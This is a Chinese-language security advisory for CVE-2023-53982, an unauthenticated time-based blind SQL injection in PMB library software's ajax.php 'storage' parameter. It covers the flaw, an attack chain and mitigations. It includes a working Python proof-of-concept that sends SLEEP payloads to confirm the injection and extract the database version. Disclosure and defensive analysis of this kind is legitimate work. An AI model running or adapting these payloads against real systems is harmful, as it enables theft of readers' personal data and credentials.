CVE-2023-53982 PMBajax.php存储参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2023-53982

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PMB (ver 7.4.6及可能更早版本)

漏洞概述

CVE-2023-53982是PMB（一个流行的图书馆管理系统）7.4.6版本中存在的严重安全漏洞。该漏洞位于ajax.php端点的storage参数中，由于缺乏适当的输入验证和过滤，攻击者可以注入恶意SQL代码。此漏洞允许未经认证的远程攻击者操纵数据库查询，执行基于时间的盲SQL注入攻击。攻击者通过注入条件睡眠语句（如SLEEP()函数）来推断数据库信息，利用响应时间的差异逐步提取敏感数据，包括用户凭证、图书信息、会员数据等。由于该漏洞影响图书馆管理系统的核心功能，潜在风险包括大量敏感数据泄露，可能涉及读者个人信息、借阅记录、财务数据等。CVSS评分7.5（高危）表明该漏洞具有较高的安全影响，无需认证即可远程利用，对系统机密性构成严重威胁。建议受影响的用户立即采取修复措施，避免遭受数据泄露攻击。

技术细节

该SQL注入漏洞存在于PMB系统的ajax.php文件中，具体位于处理storage参数的逻辑中。攻击者可以通过构造特殊的HTTP请求，在storage参数中注入SQL代码。由于应用程序未对用户输入进行充分的过滤和参数化查询，注入的SQL代码会被数据库服务器执行。技术细节如下：1）漏洞位置：ajax.php端点的storage参数；2）注入类型：基于时间的盲注（Time-based Blind SQL Injection）；3）利用方式：攻击者注入条件语句，结合SLEEP()函数和条件判断（如IF()语句），通过观察响应时间差异来推断数据库信息；4）攻击示例：攻击者可能使用类似' AND (SELECT CASE WHEN (条件) THEN SLEEP(5) ELSE 0 END) 的payload来测试注入点；5）数据提取：攻击者可以通过编写脚本自动化提取数据，每次请求推断一个字符或比特位；6）影响范围：攻击者可提取数据库中存储的任何数据，包括用户表、配置信息等。该漏洞的利用不需要任何认证，攻击者只需发送特制的HTTP请求即可触发。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统是否使用PMB图书馆管理系统，并确定ajax.php端点可访问

STEP 2

步骤2：漏洞探测

通过发送带有SQL注入payload的HTTP请求测试storage参数，验证漏洞存在（如使用时间延迟测试）

STEP 3

步骤3：自动化注入

编写脚本自动化注入过程，使用基于时间的盲注技术逐字符提取数据库信息

STEP 4

步骤4：数据提取

利用盲注技术提取敏感数据，包括数据库版本、表结构、用户凭证、图书数据等

STEP 5

步骤5：权限提升/持久化

如获取管理凭据，可进一步获取系统更高权限或长期访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2023-53982 PMB SQL Injection PoC
import requests
import time

target_url = "http://target.com/ajax.php"

def test_sqli():
    """Test for SQL injection vulnerability"""
    # Basic time-based blind SQL injection test
    payload_true = "test' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--"
    payload_false = "test' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END)--"
    
    params = {
        'storage': payload_true,
        'section': 'search',
        'sub': 'result'
    }
    
    start_time = time.time()
    response = requests.get(target_url, params=params, timeout=10)
    elapsed_true = time.time() - start_time
    
    params['storage'] = payload_false
    start_time = time.time()
    response = requests.get(target_url, params=params, timeout=10)
    elapsed_false = time.time() - start_time
    
    if elapsed_true > 4.5 and elapsed_false < 1:
        print("[+] SQL Injection vulnerability confirmed!")
        return True
    return False

def extract_data():
    """Extract database version using time-based blind SQLi"""
    print("[*] Extracting database version...")
    for version in range(5, 10):
        payload = f"test' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='{version}') THEN SLEEP(5) ELSE 0 END)--"
        params = {'storage': payload, 'section': 'search', 'sub': 'result'}
        start_time = time.time()
        requests.get(target_url, params=params, timeout=10)
        elapsed = time.time() - start_time
        if elapsed > 4.5:
            print(f"[+] Database version starts with: {version}")
            break

if __name__ == "__main__":
    print("[*] Testing CVE-2023-53982")
    if test_sqli():
        extract_data()

影响范围

PMB < 7.4.6

PMB 7.4.6（确认受影响）

可能影响更早未修补版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）通过Web服务器配置（如Nginx/Apache）限制对ajax.php的直接访问；2）实施IP白名单限制，仅允许可信IP地址访问管理接口；3）启用数据库查询日志监控，及时发现异常查询模式；4）考虑暂时禁用非必要的ajax功能；5）部署入侵检测系统监控可疑的时间延迟请求模式。